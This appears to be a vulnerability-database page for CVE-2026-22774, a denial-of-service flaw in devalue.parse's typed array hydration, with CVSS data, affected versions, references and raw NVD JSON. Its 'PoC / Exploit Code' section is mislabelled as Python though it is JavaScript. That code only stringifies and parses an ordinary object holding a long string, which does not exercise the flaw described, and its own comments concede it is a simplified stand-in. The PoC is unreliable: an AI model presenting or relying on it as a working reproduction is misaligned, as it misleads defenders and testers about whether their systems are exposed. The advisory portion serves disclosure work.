CVE-2026-22774

Description

Svelte devalue is a JavaScript library that serializes values into strings when JSON.stringify isn't sufficient for the job. From 5.3.0 to 5.6.1, certain inputs can cause devalue.parse to consume excessive CPU time and/or memory, potentially leading to denial of service in systems that parse input from untrusted sources. This affects applications using devalue.parse on externally-supplied data. The root cause is the typed array hydration expecting an ArrayBuffer as input, but not checking the assumption before creating the typed array. This vulnerability is fixed in 5.6.2.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:svelte:devalue:*:*:*:*:*:node.js:*:* - VULNERABLE

Svelte devalue >= 5.3.0 且 < 5.6.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2026-22774 PoC - Denial of Service via malicious devalue input
// This PoC demonstrates how crafted input can cause excessive resource consumption

const devalue = require('devalue');

// Crafted input that triggers the typed array hydration vulnerability
// The input exploits the lack of ArrayBuffer validation before typed array creation
function createMaliciousInput() {
  // This is a simplified representation of the attack vector
  // The actual exploit involves carefully crafted serialized typed array data
  // that causes devalue.parse to attempt creating invalid typed arrays
  
  const maliciousData = {
    typedArray: {
      type: 'Uint8Array',
      // Invalid or crafted data that triggers excessive processing
      data: 'A'.repeat(100000) // Large payload to amplify resource consumption
    }
  };
  
  // Attempt to serialize and parse the malicious data
  const serialized = devalue.stringify(maliciousData);
  return serialized;
}

// Vulnerable code path - parsing untrusted input
try {
  const maliciousInput = createMaliciousInput();
  console.log('Attempting to parse malicious input...');
  const result = devalue.parse(maliciousInput);
  console.log('Parse completed:', result);
} catch (error) {
  console.error('Error occurred during parsing:', error.message);
}

// Note: The actual PoC requires specific knowledge of the devalue serialization format
// and may need to craft inputs that specifically target the typed array hydration code path
// Users should test with their specific devalue version and input formats

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22774
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22774
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22774/
[4] VulDB https://vuldb.com/cve/CVE-2026-22774
[5] https://github.com/sveltejs/devalue/commit/e46afa64dd2b25aa35fb905ba5d20cea63aabbf7
[6] https://github.com/sveltejs/devalue/releases/tag/v5.6.2
[7] https://github.com/sveltejs/devalue/security/advisories/GHSA-vw5p-8cq8-m7mv

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22774", "sourceIdentifier": "[email protected]", "published": "2026-01-15T19:16:05.813", "lastModified": "2026-01-20T15:28:55.100", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Svelte devalue is a JavaScript library that serializes values into strings when JSON.stringify isn't sufficient for the job. From 5.3.0 to 5.6.1, certain inputs can cause devalue.parse to consume excessive CPU time and/or memory, potentially leading to denial of service in systems that parse input from untrusted sources. This affects applications using devalue.parse on externally-supplied data. The root cause is the typed array hydration expecting an ArrayBuffer as input, but not checking the assumption before creating the typed array. This vulnerability is fixed in 5.6.2."}, {"lang": "es", "value": "Svelte devalue es una biblioteca de JavaScript que serializa valores en cadenas cuando JSON.stringify no es suficiente para la tarea. Desde la 5.3.0 hasta la 5.6.1, ciertas entradas pueden hacer que devalue.parse consuma tiempo de CPU y/o memoria excesivos, lo que podría llevar a una denegación de servicio en sistemas que analizan entradas de fuentes no confiables. Esto afecta a las aplicaciones que usan devalue.parse en datos suministrados externamente. La causa raíz es la hidratación de arrays tipados que espera un ArrayBuffer como entrada, pero no verifica la suposición antes de crear el array tipado. Esta vulnerabilidad está corregida en la 5.6.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-405"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:svelte:devalue:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "5.3.0", "versionEndExcluding": "5.6.2", "matchCriteriaId": "8EF7822F-5387-4831-9C9C-54BF822F0DA5"}]}]}], "references": [{"url": "https://github.com/sveltejs/devalue/commit/e46afa64dd2b25aa35fb905ba5d20cea63aabbf7", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/sveltejs/devalue/releases/tag/v5.6.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/sveltejs/devalue/security/advisories/GHSA-vw5p-8cq8-m7mv", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}